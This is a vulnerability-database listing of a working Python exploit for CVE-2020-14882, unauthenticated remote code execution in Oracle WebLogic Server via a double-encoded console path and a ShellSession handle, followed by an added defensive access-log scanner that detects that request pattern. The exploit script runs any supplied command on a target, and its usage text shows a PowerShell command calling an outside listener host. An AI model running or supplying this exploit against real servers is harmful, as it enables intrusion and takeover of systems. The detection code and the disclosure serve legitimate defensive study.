Oracle WebLogic Server Remote Code Execution

29 Oct 2020 00:00:00 | Reported by Nguyen Jang | Type: packetstorm | Source: packetstormsecurity.com

Oracle WebLogic Server Remote Code Execution via Unauthenticated GET request

```python
#!/usr/bin/python3

# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request
# Exploit Author: Nguyen Jang
# CVE: CVE-2020-14882
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html

# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

import requests
import sys

from urllib3.exceptions import InsecureRequestWarning

if len(sys.argv) != 3:
    print("[+] WebLogic Unauthenticated RCE via GET request")
    print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
    print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")
    print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")
    exit()

target = sys.argv[1]
command = sys.argv[2]

request = requests.session()
headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}

print("[+] Sending GET Request ....")

GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)

print("[+] Done !!")
```
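
A defensive counterpart to the script above, added here as an example and not part of the original Packet Storm listing: it scans access-log lines for the request shape the script sends, namely a percent-encoded `../` under `/console/` that resolves to `console.portal`, and a `handle=` class outside the console's own package. The sample log lines are constructed, and the `com.bea.console.handles.` prefix is an assumption about what legitimate console links carry.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
CLASS_CALL_RE = re.compile(r'^(?P<cls>[\w$]+(?:\.[\w$]+)+)\(')
# Assumption: legitimate console links only pass handle classes from this package.
EXPECTED_HANDLE_PREFIX = "com.bea.console.handles."

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable, so %252E%252E%252F collapses to ../"""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return findings for one access-log line; an empty list means no match."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    path = fully_decode(parts.path).lower()
    if not (path.startswith("/console/") and "console.portal" in path):
        return []
    findings = []
    if "../" in path:
        findings.append("encoded traversal into console.portal")
    for handle in parse_qs(parts.query).get("handle", []):
        call = CLASS_CALL_RE.match(fully_decode(handle))
        if call and not call.group("cls").startswith(EXPECTED_HANDLE_PREFIX):
            findings.append("unexpected handle class: " + call.group("cls"))
    return findings

# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Oct/2020:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3512',
    '10.0.0.7 - - [29/Oct/2020:10:00:09 +0000] "GET /console/console.portal?_nfpb=true&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29 HTTP/1.1" 200 9120',
    '203.0.113.9 - - [29/Oct/2020:10:02:44 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22PLACEHOLDER%22); HTTP/1.1" 200 1024',
]

def scan(lines):
    """Return (line index, findings) for every line that matched."""
    return [(i, f) for i, line in enumerate(lines) if (f := classify(line))]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG):
        print(index, findings)
```

Decoding until the value stops changing is what catches the double-encoded form; a single `unquote` pass would leave `%2E%2E%2F` in the path and miss it.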

Vulners AI Score: 9.9 (High risk)
EPSS: 0.94454